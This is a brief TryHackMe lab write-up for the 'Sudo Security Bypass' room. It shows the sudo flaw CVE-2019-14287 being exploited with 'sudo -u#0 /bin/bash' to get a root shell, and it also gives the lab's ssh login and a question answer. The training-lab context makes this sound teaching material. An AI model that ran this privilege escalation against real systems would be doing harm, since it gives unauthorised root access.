TryHackMe - Sudo Security Bypass
Let's ssh to the machine
ssh -p 2222 tryhackme@10.10.114.224password istryhackmesudo -lsends back to us the requirement to exploitCVE-2019-14287
Following the example shown we could try to use this trick
sudo -u#0 <command>and put /bin/bash as the command and it works!
Questions
What command are you allowed to run with sudo?Answer/bin/bashWhat is the flag in /root/root.txt?I will let you answer this on your own you will need tocat /root/root.txt
Last updated